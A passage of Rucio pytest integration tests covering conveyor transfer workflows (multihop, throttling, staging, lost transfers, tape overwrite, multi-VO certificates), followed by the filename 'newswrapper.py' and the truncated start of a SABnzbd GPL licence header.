@pytest.mark.noparallel(reason="uses predefined RSEs; runs submitter and receiver")
@pytest.mark.parametrize("core_config_mock", [{"table_content": [
('transfers', 'use_multihop', True),
]}], indirect=True)
@pytest.mark.parametrize("caches_mock", [{"caches_to_mock": [
'rucio.core.rse_expression_parser.REGION', # The list of multihop RSEs is retrieved by rse expression
'rucio.core.config.REGION',
]}], indirect=True)
def test_multihop_receiver_on_failure(vo, did_factory, replica_client, root_account, core_config_mock, caches_mock, metrics_mock):
"""
Verify that the receiver correctly handles multihop jobs which fail
"""
receiver_thread = threading.Thread(target=receiver, kwargs={'id_': 0, 'full_mode': True, 'all_vos': True, 'total_threads': 1})
receiver_thread.start()
try:
src_rse = 'XRD1'
src_rse_id = rse_core.get_rse_id(rse=src_rse, vo=vo)
jump_rse = 'XRD3'
jump_rse_id = rse_core.get_rse_id(rse=jump_rse, vo=vo)
dst_rse = 'XRD4'
dst_rse_id = rse_core.get_rse_id(rse=dst_rse, vo=vo)
all_rses = [src_rse_id, jump_rse_id, dst_rse_id]
# Register a did which doesn't exist. It will trigger a failure error during the FTS transfer.
did = did_factory.random_did()
replica_client.add_replicas(rse=src_rse, files=[{'scope': did['scope'].external, 'name': did['name'], 'bytes': 1, 'adler32': 'aaaaaaaa'}])
rule_core.add_rule(dids=[did], account=root_account, copies=1, rse_expression=dst_rse, grouping='ALL', weight=None, lifetime=None, locked=False, subscription_id=None)
submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], group_bulk=2, partition_wait_time=None, transfertype='single', filter_transfertool=None)
request = __wait_for_request_state(dst_rse_id=jump_rse_id, state=RequestState.FAILED, run_poller=False, **did)
assert request['state'] == RequestState.FAILED
# We use FTS "Completion" messages in receiver. In case of multi-hops transfer failures, FTS doesn't start
# next transfers; so it never sends a "completion" message for some hops. Rely on poller in such cases.
# TODO: set the run_poller argument to False if we ever manage to make the receiver correctly handle multi-hop failures.
request = __wait_for_request_state(dst_rse_id=dst_rse_id, state=RequestState.FAILED, run_poller=True, **did)
assert request['state'] == RequestState.FAILED
assert 'Unused hop in multi-hop' in request['err_msg']
# First hop will be handled by receiver; second hop by poller
assert metrics_mock.get_sample_value('rucio_daemons_conveyor_receiver_update_request_state_total', labels={'updated': 'True'}) >= 1
assert metrics_mock.get_sample_value('rucio_daemons_conveyor_poller_update_request_state_total', labels={'updated': 'True'}) >= 1
finisher(once=True, partition_wait_time=None)
# The intermediate request must not be re-scheduled by finisher
with pytest.raises(RequestNotFound):
request_core.get_request_by_did(rse_id=jump_rse_id, **did)
request = request_core.get_request_by_did(rse_id=dst_rse_id, **did)
# ensure tha the ranking was correctly decreased for the whole path
assert __get_source(request_id=request['id'], src_rse_id=jump_rse_id, **did).ranking == -1
assert __get_source(request_id=request['id'], src_rse_id=src_rse_id, **did).ranking == -1
assert request['state'] == RequestState.QUEUED
finally:
receiver_graceful_stop.set()
receiver_thread.join(timeout=5)
receiver_graceful_stop.clear()
@skip_rse_tests_with_accounts
@pytest.mark.noparallel(reason="uses predefined RSEs; runs submitter and receiver")
@pytest.mark.parametrize("core_config_mock", [{"table_content": [
('transfers', 'use_multihop', True),
]}], indirect=True)
@pytest.mark.parametrize("caches_mock", [{"caches_to_mock": [
'rucio.core.rse_expression_parser.REGION', # The list of multihop RSEs is retrieved by rse expression
'rucio.core.config.REGION',
]}], indirect=True)
def test_multihop_receiver_on_success(vo, did_factory, root_account, core_config_mock, caches_mock, metrics_mock):
"""
Verify that the receiver correctly handles successful multihop jobs
"""
receiver_thread = threading.Thread(target=receiver, kwargs={'id_': 0, 'full_mode': True, 'all_vos': True, 'total_threads': 1})
receiver_thread.start()
try:
src_rse = 'XRD1'
src_rse_id = rse_core.get_rse_id(rse=src_rse, vo=vo)
jump_rse = 'XRD3'
jump_rse_id = rse_core.get_rse_id(rse=jump_rse, vo=vo)
dst_rse = 'XRD4'
dst_rse_id = rse_core.get_rse_id(rse=dst_rse, vo=vo)
all_rses = [src_rse_id, jump_rse_id, dst_rse_id]
did = did_factory.upload_test_file(src_rse)
rule_priority = 5
rule_core.add_rule(dids=[did], account=root_account, copies=1, rse_expression=dst_rse, grouping='ALL', weight=None, lifetime=None, locked=False, subscription_id=None, priority=rule_priority)
submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], group_bulk=2, partition_wait_time=None, transfertype='single', filter_transfertool=None)
request = __wait_for_request_state(dst_rse_id=jump_rse_id, state=RequestState.DONE, run_poller=False, **did)
assert request['state'] == RequestState.DONE
request = __wait_for_request_state(dst_rse_id=dst_rse_id, state=RequestState.DONE, run_poller=False, **did)
assert request['state'] == RequestState.DONE
fts_response = FTS3Transfertool(external_host=TEST_FTS_HOST).bulk_query(request['external_id'])
assert fts_response[request['external_id']][request['id']]['priority'] == rule_priority
# Two hops; both handled by receiver
assert metrics_mock.get_sample_value('rucio_daemons_conveyor_receiver_update_request_state_total', labels={'updated': 'True'}) >= 2
finally:
receiver_graceful_stop.set()
receiver_thread.join(timeout=5)
receiver_graceful_stop.clear()
@skip_rse_tests_with_accounts
@pytest.mark.noparallel(reason="runs multiple conveyor daemons")
@pytest.mark.parametrize("file_config_mock", [{
"overrides": [('conveyor', 'use_preparer', 'true')]
}], indirect=True)
@pytest.mark.parametrize("core_config_mock", [{
"table_content": [('throttler', 'mode', 'DEST_PER_ALL_ACT')]
}], indirect=True)
def test_preparer_throttler_submitter(rse_factory, did_factory, root_account, file_config_mock, core_config_mock, metrics_mock):
"""
Integration test of the preparer/throttler workflow.
"""
src_rse, src_rse_id = rse_factory.make_rse(scheme='mock', protocol_impl='rucio.rse.protocols.posix.Default')
dst_rse1, dst_rse_id1 = rse_factory.make_rse(scheme='mock', protocol_impl='rucio.rse.protocols.posix.Default')
dst_rse2, dst_rse_id2 = rse_factory.make_rse(scheme='mock', protocol_impl='rucio.rse.protocols.posix.Default')
all_rses = [src_rse_id, dst_rse_id1, dst_rse_id2]
for rse_id in all_rses:
rse_core.add_rse_attribute(rse_id, 'fts', TEST_FTS_HOST)
distance_core.add_distance(src_rse_id, dst_rse_id1, ranking=10)
distance_core.add_distance(src_rse_id, dst_rse_id2, ranking=10)
# Set limits only for one of the RSEs
rse_core.set_rse_transfer_limits(dst_rse_id1, max_transfers=1, activity='all_activities', strategy='fifo')
did1 = did_factory.upload_test_file(src_rse)
did2 = did_factory.upload_test_file(src_rse)
rule_core.add_rule(dids=[did1], account=root_account, copies=1, rse_expression=dst_rse1, grouping='ALL', weight=None, lifetime=None, locked=False, subscription_id=None)
rule_core.add_rule(dids=[did2], account=root_account, copies=1, rse_expression=dst_rse1, grouping='ALL', weight=None, lifetime=None, locked=False, subscription_id=None)
rule_core.add_rule(dids=[did1], account=root_account, copies=1, rse_expression=dst_rse2, grouping='ALL', weight=None, lifetime=None, locked=False, subscription_id=None)
request = request_core.get_request_by_did(rse_id=dst_rse_id1, **did1)
assert request['state'] == RequestState.PREPARING
request = request_core.get_request_by_did(rse_id=dst_rse_id1, **did2)
assert request['state'] == RequestState.PREPARING
request = request_core.get_request_by_did(rse_id=dst_rse_id2, **did1)
assert request['state'] == RequestState.PREPARING
# submitter must not work on PREPARING replicas
submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], group_bulk=2, partition_wait_time=None, transfertype='single', filter_transfertool=None)
# One RSE has limits set: the requests will be moved to WAITING status; the other RSE has no limits: go directly to queued
preparer(once=True, sleep_time=1, bulk=100, partition_wait_time=None)
request = request_core.get_request_by_did(rse_id=dst_rse_id1, **did1)
assert request['state'] == RequestState.WAITING
request = request_core.get_request_by_did(rse_id=dst_rse_id1, **did2)
assert request['state'] == RequestState.WAITING
request = request_core.get_request_by_did(rse_id=dst_rse_id2, **did1)
assert request['state'] == RequestState.QUEUED
# submitter must not work on WAITING replicas
submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], group_bulk=2, partition_wait_time=None, transfertype='single', filter_transfertool=None)
# One of the waiting requests will be queued, the second will remain in waiting state
throttler(once=True, partition_wait_time=None)
# Check metrics.
# This gauge values are recorded at the beginning of the execution. Hence 2 waiting and 0 transfers
gauge_name = 'rucio_daemons_conveyor_throttler_set_rse_transfer_limits'
assert metrics_mock.get_sample_value(gauge_name, labels={'activity': 'all_activities', 'rse': dst_rse1, 'limit_attr': 'max_transfers'}) == 1
assert metrics_mock.get_sample_value(gauge_name, labels={'activity': 'all_activities', 'rse': dst_rse1, 'limit_attr': 'transfers'}) == 0
assert metrics_mock.get_sample_value(gauge_name, labels={'activity': 'all_activities', 'rse': dst_rse1, 'limit_attr': 'waiting'}) == 2
request1 = request_core.get_request_by_did(rse_id=dst_rse_id1, **did1)
request2 = request_core.get_request_by_did(rse_id=dst_rse_id1, **did2)
# one request WAITING and other QUEUED
assert (request1['state'] == RequestState.WAITING and request2['state'] == RequestState.QUEUED
or request1['state'] == RequestState.QUEUED and request2['state'] == RequestState.WAITING)
waiting_did = did1 if request1['state'] == RequestState.WAITING else did2
queued_did = did1 if request1['state'] == RequestState.QUEUED else did2
submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], group_bulk=2, partition_wait_time=None, transfertype='single', filter_transfertool=None)
# Calling the throttler again will not schedule the waiting request, because there is a submitted one
throttler(once=True, partition_wait_time=None)
# This gauge values are recorded at the beginning of the execution. Hence 1 waiting and one transfer
assert metrics_mock.get_sample_value(gauge_name, labels={'activity': 'all_activities', 'rse': dst_rse1, 'limit_attr': 'max_transfers'}) == 1
assert metrics_mock.get_sample_value(gauge_name, labels={'activity': 'all_activities', 'rse': dst_rse1, 'limit_attr': 'transfers'}) == 1
assert metrics_mock.get_sample_value(gauge_name, labels={'activity': 'all_activities', 'rse': dst_rse1, 'limit_attr': 'waiting'}) == 1
request = request_core.get_request_by_did(rse_id=dst_rse_id1, **waiting_did)
assert request['state'] == RequestState.WAITING
request = __wait_for_request_state(dst_rse_id=dst_rse_id1, state=RequestState.DONE, **queued_did)
assert request['state'] == RequestState.DONE
request = __wait_for_request_state(dst_rse_id=dst_rse_id2, state=RequestState.DONE, **did1)
assert request['state'] == RequestState.DONE
# Now that the submitted transfers are finished, the WAITING one can be queued
throttler(once=True, partition_wait_time=None)
request = request_core.get_request_by_did(rse_id=dst_rse_id1, **waiting_did)
assert request['state'] == RequestState.QUEUED
@skip_rse_tests_with_accounts
@pytest.mark.dirty(reason="leaves files in XRD containers")
@pytest.mark.noparallel(reason="runs submitter; poller and finisher")
@pytest.mark.parametrize("caches_mock", [{"caches_to_mock": [
'rucio.common.rse_attributes.REGION',
'rucio.core.rse.REGION',
'rucio.rse.rsemanager.RSE_REGION', # for RSE info
]}], indirect=True)
def test_non_deterministic_dst(did_factory, did_client, root_account, vo, caches_mock):
"""
Test a transfer towards a non-deterministic RSE
"""
src_rse = 'XRD3'
src_rse_id = rse_core.get_rse_id(rse=src_rse, vo=vo)
dst_rse = 'XRD4'
dst_rse_id = rse_core.get_rse_id(rse=dst_rse, vo=vo)
all_rses = [src_rse_id, dst_rse_id]
did = did_factory.upload_test_file(src_rse)
# Dataset name is part of the non-deterministic path
dataset = did_factory.make_dataset()
did_client.add_files_to_dataset(files=[{'scope': did['scope'].external, 'name': did['name']}], scope=dataset['scope'].external, name=dataset['name'])
rse_core.update_rse(rse_id=dst_rse_id, parameters={'deterministic': False})
try:
rule_core.add_rule(dids=[did], account=root_account, copies=1, rse_expression=dst_rse, grouping='ALL', weight=None, lifetime=None, locked=False, subscription_id=None)
submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], group_bulk=2, partition_wait_time=None, transfertype='single', filter_transfertool=None)
replica = __wait_for_replica_transfer(dst_rse_id=dst_rse_id, **did)
assert replica['state'] == ReplicaState.AVAILABLE
finally:
rse_core.update_rse(rse_id=dst_rse_id, parameters={'deterministic': True})
@skip_rse_tests_with_accounts
@pytest.mark.noparallel(reason="runs stager; poller and finisher")
def test_stager(rse_factory, did_factory, root_account, replica_client):
"""
Submit a real transfer to FTS and rely on the gfal "mock" plugin to report a simulated "success"
https://gitlab.cern.ch/dmc/gfal2/-/blob/master/src/plugins/mock/README_PLUGIN_MOCK
"""
src_rse, src_rse_id = rse_factory.make_rse(scheme='mock', protocol_impl='rucio.rse.protocols.posix.Default', rse_type=RSEType.TAPE)
dst_rse, dst_rse_id = rse_factory.make_rse(scheme='mock', protocol_impl='rucio.rse.protocols.posix.Default')
all_rses = [src_rse_id, dst_rse_id]
distance_core.add_distance(src_rse_id, dst_rse_id, ranking=10)
rse_core.add_rse_attribute(src_rse_id, 'staging_buffer', dst_rse)
for rse_id in all_rses:
rse_core.add_rse_attribute(rse_id, 'fts', TEST_FTS_HOST)
did = did_factory.upload_test_file(src_rse)
replica = replica_core.get_replica(rse_id=src_rse_id, **did)
replica_client.add_replicas(rse=dst_rse, files=[{'scope': did['scope'].external, 'name': did['name'], 'state': 'C',
'bytes': replica['bytes'], 'adler32': replica['adler32'], 'md5': replica['md5']}])
request_core.queue_requests(requests=[{'dest_rse_id': dst_rse_id,
'scope': did['scope'],
'name': did['name'],
'rule_id': '00000000000000000000000000000000',
'attributes': {
'source_replica_expression': src_rse,
'activity': 'Some Activity',
'bytes': replica['bytes'],
'adler32': replica['adler32'],
'md5': replica['md5'],
},
'request_type': RequestType.STAGEIN,
'retry_count': 0,
'account': root_account,
'requested_at': datetime.now()}])
stager(once=True, rses=[{'id': rse_id} for rse_id in all_rses])
replica = __wait_for_replica_transfer(dst_rse_id=dst_rse_id, max_wait_seconds=2 * MAX_POLL_WAIT_SECONDS, **did)
assert replica['state'] == ReplicaState.AVAILABLE
@skip_rse_tests_with_accounts
@pytest.mark.noparallel(reason="runs submitter; poller and finisher")
def test_lost_transfers(rse_factory, did_factory, root_account):
"""
Correctly handle FTS "404 not found" errors.
"""
src_rse, src_rse_id = rse_factory.make_rse(scheme='mock', protocol_impl='rucio.rse.protocols.posix.Default')
dst_rse, dst_rse_id = rse_factory.make_rse(scheme='mock', protocol_impl='rucio.rse.protocols.posix.Default')
all_rses = [src_rse_id, dst_rse_id]
distance_core.add_distance(src_rse_id, dst_rse_id, ranking=10)
for rse_id in all_rses:
rse_core.add_rse_attribute(rse_id, 'fts', TEST_FTS_HOST)
did = did_factory.upload_test_file(src_rse)
rule_core.add_rule(dids=[did], account=root_account, copies=1, rse_expression=dst_rse, grouping='ALL', weight=None, lifetime=None, locked=False, subscription_id=None)
@transactional_session
def __update_request(request_id, session=None, **kwargs):
session.query(models.Request).filter_by(id=request_id).update(kwargs, synchronize_session=False)
# Fake that the transfer is submitted and lost
submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], group_bulk=2, partition_wait_time=None, transfertype='single', filter_transfertool=None)
request = request_core.get_request_by_did(rse_id=dst_rse_id, **did)
__update_request(request['id'], external_id='some-fake-random-id')
# The request must be marked lost
request = __wait_for_request_state(dst_rse_id=dst_rse_id, state=RequestState.LOST, **did)
assert request['state'] == RequestState.LOST
# Set update time far in the past to bypass protections (not resubmitting too fast).
# Run finisher and submitter, the request must be resubmitted and transferred correctly
__update_request(request['id'], updated_at=datetime.utcnow() - timedelta(days=1))
finisher(once=True, partition_wait_time=None)
# The source ranking must not be updated for submission failures and lost transfers
request = request_core.get_request_by_did(rse_id=dst_rse_id, **did)
assert __get_source(request_id=request['id'], src_rse_id=src_rse_id, **did).ranking == 0
submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], group_bulk=2, partition_wait_time=None, transfertype='single', filter_transfertool=None)
replica = __wait_for_replica_transfer(dst_rse_id=dst_rse_id, **did)
assert replica['state'] == ReplicaState.AVAILABLE
@skip_rse_tests_with_accounts
@pytest.mark.noparallel(reason="runs submitter; poller and finisher")
def test_cancel_rule(rse_factory, did_factory, root_account):
"""
Ensure that, when we cancel a rule, the request is cancelled in FTS
"""
src_rse, src_rse_id = rse_factory.make_rse(scheme='mock', protocol_impl='rucio.rse.protocols.posix.Default')
dst_rse, dst_rse_id = rse_factory.make_rse(scheme='mock', protocol_impl='rucio.rse.protocols.posix.Default')
all_rses = [src_rse_id, dst_rse_id]
distance_core.add_distance(src_rse_id, dst_rse_id, ranking=10)
for rse_id in all_rses:
rse_core.add_rse_attribute(rse_id, 'fts', TEST_FTS_HOST)
did = did_factory.upload_test_file(src_rse)
[rule_id] = rule_core.add_rule(dids=[did], account=root_account, copies=1, rse_expression=dst_rse, grouping='ALL', weight=None, lifetime=None, locked=False, subscription_id=None)
class _FTSWrapper(FTSWrapper):
@staticmethod
def on_submit(file):
# Simulate using the mock gfal plugin that it takes a long time to copy the file
file['sources'] = [set_query_parameters(s_url, {'time': 30}) for s_url in file['sources']]
with patch('rucio.daemons.conveyor.submitter.TRANSFERTOOL_CLASSES_BY_NAME') as tt_mock:
tt_mock.__getitem__.return_value = _FTSWrapper
submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], group_bulk=2, partition_wait_time=None, transfertype='single', filter_transfertool=None)
request = request_core.get_request_by_did(rse_id=dst_rse_id, **did)
rule_core.delete_rule(rule_id)
with pytest.raises(RequestNotFound):
request_core.get_request_by_did(rse_id=dst_rse_id, **did)
fts_response = FTS3Transfertool(external_host=TEST_FTS_HOST).bulk_query(request['external_id'])
assert fts_response[request['external_id']][request['id']]['job_state'] == 'CANCELED'
class FTSWrapper(FTS3Transfertool):
"""
Used to alter the JSON exchange with FTS.
One use-case would be to use the "mock" gfal plugin (by using a mock:// protocol/scheme) to simulate failuare on fts side.
For example, adding size_pre=<something> url parameter would result in "stat" calls on FTS side to return(simulate) this file size.
https://gitlab.cern.ch/dmc/gfal2/-/blob/master/src/plugins/mock/README_PLUGIN_MOCK
"""
@staticmethod
def on_submit(file):
pass
@staticmethod
def on_receive(job_response):
pass
@classmethod
def _FTS3Transfertool__file_from_transfer(cls, transfer, job_params):
file = super()._FTS3Transfertool__file_from_transfer(transfer, job_params)
cls.on_submit(file)
return file
def _FTS3Transfertool__bulk_query_responses(self, jobs_response):
self.on_receive(jobs_response)
return super()._FTS3Transfertool__bulk_query_responses(jobs_response)
@pytest.fixture
def overwrite_on_tape_topology(rse_factory, did_factory, root_account, vo, file_factory):
"""
Prepares the XRD* RSEs for an overwrite_on_tape test.
- fakes that one xroot RSE is a tape destination (and rollbacks the change after the test)
Return a factory which allows to upload/register/add_rule for two dids
"""
rse1 = 'XRD1'
rse1_id = rse_core.get_rse_id(rse=rse1, vo=vo)
rse2 = 'XRD3'
rse2_id = rse_core.get_rse_id(rse=rse2, vo=vo)
rse3 = 'XRD4'
rse3_id = rse_core.get_rse_id(rse=rse3, vo=vo)
def __generate_and_upload_file(src_rse, dst_rse, simulate_dst_corrupted=False):
"""
Create and upload real files to source and destination. Don't register it on destination. This way, fts will fail if overwrite = False
If simulate_dst_corrupted is True, will upload a different file to destination, to simulate that it is corrupted
"""
local_file = file_factory.file_generator()
did = did_factory.random_did()
did_factory.upload_test_file(src_rse, path=local_file, **did)
did_factory.upload_client.upload(
[
{
'path': file_factory.file_generator(size=3) if simulate_dst_corrupted else local_file,
'rse': dst_rse,
'did_scope': did['scope'].external,
'did_name': did['name'],
'no_register': True,
}
]
)
return did
def __create_dids(did1_corrupted=True, did2_corrupted=True):
"""
Uploads two files:
- one which requires multiple transfer hop to go to destination
- one which can be transferred in one hop to destination rse
"""
# multihop transfer:
did1 = __generate_and_upload_file(rse1, rse3, simulate_dst_corrupted=did1_corrupted)
# direct transfer
did2 = __generate_and_upload_file(rse2, rse3, simulate_dst_corrupted=did2_corrupted)
rule_core.add_rule(dids=[did1, did2], account=root_account, copies=1, rse_expression=rse3, grouping='ALL', weight=None, lifetime=None, locked=False, subscription_id=None)
return rse1_id, rse2_id, rse3_id, did1, did2
# Fake that destination RSE is a tape
rse_core.update_rse(rse_id=rse3_id, parameters={'rse_type': RSEType.TAPE})
try:
rse_core.add_rse_attribute(rse3_id, 'archive_timeout', 60)
yield __create_dids
finally:
rse_core.update_rse(rse_id=rse3_id, parameters={'rse_type': RSEType.DISK})
rse_core.del_rse_attribute(rse3_id, 'archive_timeout')
@skip_rse_tests_with_accounts
@pytest.mark.dirty(reason="leaves files in XRD containers")
@pytest.mark.noparallel(reason="runs submitter; poller and finisher")
@pytest.mark.parametrize("core_config_mock", [{"table_content": [
('transfers', 'use_multihop', True)
]}], indirect=True)
@pytest.mark.parametrize("caches_mock", [{"caches_to_mock": [
'rucio.common.rse_attributes.REGION',
'rucio.core.rse.REGION',
'rucio.core.rse_expression_parser.REGION', # The list of multihop RSEs is retrieved by an expression
'rucio.core.config.REGION',
'rucio.rse.rsemanager.RSE_REGION', # for RSE info
]}], indirect=True)
def test_overwrite_on_tape(overwrite_on_tape_topology, core_config_mock, caches_mock):
"""
Ensure that overwrite is not set for transfers towards TAPE RSEs
"""
rse1_id, rse2_id, rse3_id, did1, did2 = overwrite_on_tape_topology(did1_corrupted=False, did2_corrupted=True)
all_rses = [rse1_id, rse2_id, rse3_id]
submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], group_bulk=10, partition_wait_time=None, transfertype='single', filter_transfertool=None)
request = __wait_for_request_state(dst_rse_id=rse3_id, state=RequestState.FAILED, **did1)
assert request['state'] == RequestState.FAILED
assert 'Destination file exists and overwrite is not enabled' in request['err_msg']
request = __wait_for_request_state(dst_rse_id=rse3_id, state=RequestState.FAILED, **did2)
assert request['state'] == RequestState.FAILED
assert 'Destination file exists and overwrite is not enabled' in request['err_msg']
@skip_rse_tests_with_accounts
@pytest.mark.dirty(reason="leaves files in XRD containers")
@pytest.mark.noparallel(reason="runs submitter; poller and finisher")
@pytest.mark.parametrize("core_config_mock", [{"table_content": [
('transfers', 'use_multihop', True)
]}], indirect=True)
@pytest.mark.parametrize("caches_mock", [{"caches_to_mock": [
'rucio.common.rse_attributes.REGION',
'rucio.core.rse.REGION',
'rucio.core.rse_expression_parser.REGION', # The list of multihop RSEs is retrieved by an expression
'rucio.core.config.REGION',
'rucio.rse.rsemanager.RSE_REGION', # for RSE info
]}], indirect=True)
def test_file_exists_handled(overwrite_on_tape_topology, core_config_mock, caches_mock):
"""
If a transfer fails because the destination job_params exists, and the size+checksums of that existing job_params
are correct, the transfer must be marked successful.
"""
rse1_id, rse2_id, rse3_id, did1, did2 = overwrite_on_tape_topology(did1_corrupted=False, did2_corrupted=False)
all_rses = [rse1_id, rse2_id, rse3_id]
class _FTSWrapper(FTSWrapper):
@staticmethod
def on_receive(job_params):
for job in (job_params if isinstance(job_params, list) else [job_params]):
for file in job.get('files', []):
if (file.get('file_metadata', {}).get('dst_type') == 'TAPE'
and file.get('file_metadata', {}).get('dst_file', {}).get('file_on_tape') is not None):
# Fake that dst_file metadata contains file_on_tape == True
# As we don't really have tape RSEs in our tests, file_on_tape is always false
file['file_metadata']['dst_file']['file_on_tape'] = True
return job_params
with patch('rucio.core.transfer.FTS3Transfertool', _FTSWrapper):
submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], group_bulk=10, partition_wait_time=None, transfertype='single', filter_transfertool=None)
request = __wait_for_request_state(dst_rse_id=rse3_id, state=RequestState.DONE, **did1)
assert request['state'] == RequestState.DONE
request = __wait_for_request_state(dst_rse_id=rse3_id, state=RequestState.DONE, **did2)
assert request['state'] == RequestState.DONE
@skip_rse_tests_with_accounts
@pytest.mark.dirty(reason="leaves files in XRD containers; leaves pending fts transfers in archiving state")
@pytest.mark.noparallel(reason="runs submitter; poller and finisher")
@pytest.mark.parametrize("core_config_mock", [{"table_content": [
('transfers', 'use_multihop', True),
('transfers', 'overwrite_corrupted_files', False)
]}], indirect=True)
@pytest.mark.parametrize("caches_mock", [{"caches_to_mock": [
'rucio.common.rse_attributes.REGION',
'rucio.core.rse.REGION',
'rucio.core.rse_expression_parser.REGION', # The list of multihop RSEs is retrieved by an expression
'rucio.core.config.REGION',
'rucio.rse.rsemanager.RSE_REGION', # for RSE info
]}], indirect=True)
def test_overwrite_corrupted_files(overwrite_on_tape_topology, core_config_mock, caches_mock):
"""
If a transfer fails because the destination exists, and the size+checksums of the destination file are wrong,
the next submission must be performed according to the overwrite_corrupted_files config paramenter.
"""
rse1_id, rse2_id, rse3_id, did1, did2 = overwrite_on_tape_topology(did1_corrupted=True, did2_corrupted=True)
all_rses = [rse1_id, rse2_id, rse3_id]
class _FTSWrapper(FTSWrapper):
@staticmethod
def on_receive(job_params):
for job in (job_params if isinstance(job_params, list) else [job_params]):
for file in job.get('files', []):
if (file.get('file_metadata', {}).get('dst_type') == 'TAPE'
and file.get('file_metadata', {}).get('dst_file', {}).get('file_on_tape') is not None):
# Fake that dst_file metadata contains file_on_tape == True
# As we don't really have tape RSEs in our tests, file_on_tape is always false
file['file_metadata']['dst_file']['file_on_tape'] = True
return job_params
with patch('rucio.core.transfer.FTS3Transfertool', _FTSWrapper):
submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], group_bulk=10, partition_wait_time=None, transfertype='single', filter_transfertool=None)
# Both transfers must be marked as failed because the file size is incorrect
request = __wait_for_request_state(dst_rse_id=rse3_id, state=RequestState.FAILED, **did1)
assert request['state'] == RequestState.FAILED
request = __wait_for_request_state(dst_rse_id=rse3_id, state=RequestState.FAILED, **did2)
assert request['state'] == RequestState.FAILED
# Re-submit the failed requests. They must fail again, because overwrite_corrupted_files is False
finisher(once=True, partition_wait_time=None)
request = request_core.get_request_by_did(rse_id=rse3_id, **did1)
assert request['state'] == RequestState.QUEUED
request = request_core.get_request_by_did(rse_id=rse3_id, **did2)
assert request['state'] == RequestState.QUEUED
submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], group_bulk=10, partition_wait_time=None, transfertype='single', filter_transfertool=None)
# Set overwrite to True before running the poller or finisher
core_config.set('transfers', 'overwrite_corrupted_files', True)
request = __wait_for_request_state(dst_rse_id=rse3_id, state=RequestState.FAILED, **did1)
assert request['state'] == RequestState.FAILED
request = __wait_for_request_state(dst_rse_id=rse3_id, state=RequestState.FAILED, **did2)
assert request['state'] == RequestState.FAILED
# Re-submit one more time. Now the destination file must be overwritten
finisher(once=True, partition_wait_time=None)
request = request_core.get_request_by_did(rse_id=rse3_id, **did1)
assert request['state'] == RequestState.QUEUED
request = request_core.get_request_by_did(rse_id=rse3_id, **did2)
assert request['state'] == RequestState.QUEUED
submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], group_bulk=10, partition_wait_time=None, transfertype='single', filter_transfertool=None)
request = request_core.get_request_by_did(rse_id=rse3_id, **did1)
assert request['state'] == RequestState.SUBMITTED
assert __wait_for_fts_state(request, expected_state='ARCHIVING') == 'ARCHIVING'
request = request_core.get_request_by_did(rse_id=rse3_id, **did2)
assert request['state'] == RequestState.SUBMITTED
assert __wait_for_fts_state(request, expected_state='ARCHIVING') == 'ARCHIVING'
@pytest.mark.noparallel(reason="runs submitter; poller and finisher")
@pytest.mark.parametrize("file_config_mock", [{"overrides": [
('conveyor', 'usercert', 'DEFAULT_DUMMY_CERT'),
('vo_certs', 'new', 'NEW_VO_DUMMY_CERT'),
]}], indirect=True)
def test_multi_vo_certificates(file_config_mock, rse_factory, did_factory, scope_factory, vo, second_vo):
"""
Test that submitter and poller call fts with correct certificates in multi-vo env
"""
_, [scope1, scope2] = scope_factory(vos=[vo, second_vo])
def __init_test_for_vo(vo, scope):
src_rse, src_rse_id = rse_factory.make_rse(scheme='mock', protocol_impl='rucio.rse.protocols.posix.Default', vo=vo)
dst_rse, dst_rse_id = rse_factory.make_rse(scheme='mock', protocol_impl='rucio.rse.protocols.posix.Default', vo=vo)
all_rses = [src_rse_id, dst_rse_id]
for rse_id in all_rses:
rse_core.add_rse_attribute(rse_id, 'fts', TEST_FTS_HOST)
distance_core.add_distance(src_rse_id, dst_rse_id, ranking=10)
account = InternalAccount('root', vo=vo)
did = did_factory.random_did(scope=scope)
replica_core.add_replica(rse_id=src_rse_id, scope=scope, name=did['name'], bytes_=1, account=account, adler32=None, md5=None)
rule_core.add_rule(dids=[did], account=account, copies=1, rse_expression=dst_rse, grouping='ALL', weight=None,
lifetime=None, locked=False, subscription_id=None, ignore_account_limit=True)
return all_rses
all_rses = []
rses = __init_test_for_vo(vo=vo, scope=scope1)
all_rses.extend(rses)
rses = __init_test_for_vo(vo=second_vo, scope=scope2)
all_rses.extend(rses)
certs_used_by_submitter = []
certs_used_by_poller = []
class _FTSWrapper(FTS3Transfertool):
# Override fts3 transfertool. Don't actually perform any interaction with fts; and record the certificates used
def submit(self, transfers, job_params, timeout=None):
certs_used_by_submitter.append(self.cert[0])
return generate_uuid()
def bulk_query(self, transfer_ids, timeout=None):
certs_used_by_poller.append(self.cert[0])
return {}
with patch('rucio.daemons.conveyor.submitter.TRANSFERTOOL_CLASSES_BY_NAME') as tt_mock:
tt_mock.__getitem__.return_value = _FTSWrapper
submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], group_bulk=2, partition_wait_time=None, transfertype='single', filter_transfertool=None)
assert sorted(certs_used_by_submitter) == ['DEFAULT_DUMMY_CERT', 'NEW_VO_DUMMY_CERT']
with patch('rucio.core.transfer.FTS3Transfertool', _FTSWrapper):
poller(once=True, older_than=0, partition_wait_time=None)
assert sorted(certs_used_by_poller) == ['DEFAULT_DUMMY_CERT', 'NEW_VO_DUMMY_CERT']
|
newswrapper.py
|
#!/usr/bin/python -OO
# Copyright 2008-2017 The SABnzbd-Team <team@sabnzbd.org>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
